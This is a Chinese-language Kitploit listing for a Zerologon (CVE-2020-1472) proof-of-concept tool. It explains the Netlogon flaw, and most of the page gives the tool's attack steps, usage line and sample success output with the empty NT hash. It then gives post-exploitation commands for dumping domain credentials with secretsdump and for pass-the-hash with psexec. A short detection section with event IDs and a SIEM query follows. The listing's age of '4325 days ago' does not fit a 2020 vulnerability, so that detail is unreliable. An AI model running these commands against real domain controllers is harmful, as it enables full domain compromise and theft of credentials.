Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
权限提升密码攻击漏洞分析漏洞利用后渗透利用渗透测试论文与研究学习与教育红队
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) 概念验证应用程序 - 关键 Active Directory 漏洞利用工具。

查看仓库
4325天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Zerologon (CVE-2020-1472)

概述

该项目实现了 Zerologon 漏洞 (CVE-2020-1472),这是最严重的 Active Directory 安全漏洞之一。该漏洞允许未经身份验证的攻击者通过重置域控制器的机器账户密码,从而破坏整个 Active Directory 域。

CVSS 评分:10.0(严重)

什么是 Zerologon?

Zerologon 是 Microsoft 的 Netlogon 远程协议 (MS-NRPC) 中的一个加密缺陷。该漏洞存在于 Netlogon 使用 AES-CFB8 加密并采用硬编码的零初始化向量 (IV) 的方式中。

技术摘要:

  • Netlogon 协议使用挑战-响应身份验证机制
  • 由于不正确的加密实现,全零挑战有 1/256 的概率产生有效身份验证
  • 攻击者可以发送约 2000 次身份验证尝试来可靠地利用此缺陷
  • 一旦通过身份验证,攻击者可以将域控制器的机器账户密码重置为已知值(空哈希)

工作原理

root@kitploit:~
1. 目标选择
   └─> 识别域控制器(FQDN、NetBIOS 名称、机器账户)

2. 挑战阶段 (I_NetServerReqChallenge)
   └─> 发送全零客户端挑战 (0x0000000000000000)
   └─> 接收服务器挑战

3. 身份验证阶段 (I_NetServerAuthenticate2)
   └─> 使用空凭证尝试身份验证
   └─> 重复直到成功(每次尝试成功率约 1/256)

4. 密码重置阶段 (I_NetServerPasswordSet2)
   └─> 将 DC 机器账户密码重置为空
   └─> 新 NT 哈希:31d6cfe0d16ae931b73c59d7e0c089c0(空密码)

5. 后渗透
   └─> 使用空凭证进行哈希传递
   └─> 完全控制域

构建项目

先决条件

  • Windows 开发环境 (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

编译

使用 Visual Studio:

root@kitploit:~
1. 打开 Visual Studio
2. 从 **生成** 菜单中选择 **生成解决方案**。

用法

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

示例:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

参数:

  • DC_FQDN:目标域控制器的完全限定域名
  • DC_NetBIOS_Name:域控制器的 NetBIOS 名称(通常是主机名)
  • Machine_Account_Name:机器账户名称(必须以 $ 结尾)

预期输出:

成功利用:

root@kitploit:~
[+] 正在定位域控制器:
    FQDN           : DC01.corp.example.com
    NetBIOS 名称   : DC01
    机器账户       : DC01$

[+] 成功:机器账户密码已重置为空!
[+] 现在使用哈希传递:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] 然后运行:secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

利用失败(已修补系统):

root@kitploit:~
[-] 2000 次尝试后攻击失败。目标可能已修补。

后渗透

成功重置 DC 密码后,您可以:

  1. 转储域凭据:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. 哈希传递身份验证:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

检测

基于网络的检测:

  • 来自单个源的多次失败的 Netlogon 身份验证尝试
  • MS-NRPC 流量中的异常模式
  • 针对 Zerologon 利用的 IDS/IPS 签名

基于日志的检测:

root@kitploit:~
事件查看器 → Windows 日志 → 系统
- 事件 ID 5827:多次密码验证失败
- 事件 ID 5829:安全通道重置

SIEM 查询:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

免责声明

此工具仅供 教育和授权的安全研究目的 使用。

作者对误用此代码不承担任何责任。

参考文献

官方资源:

  • CVE-2020-1472 - NIST
  • Microsoft 安全公告
  • Secura 研究报告

技术分析:

  • Microsoft Netlogon 协议规范
  • Zerologon 技术深入分析

工具:

  • Impacket 工具包 - 用于后渗透
  • Mimikatz - 凭据提取

许可证

该项目采用 MIT 许可证。更多信息,请参阅 LICENSE 文件。

下载工具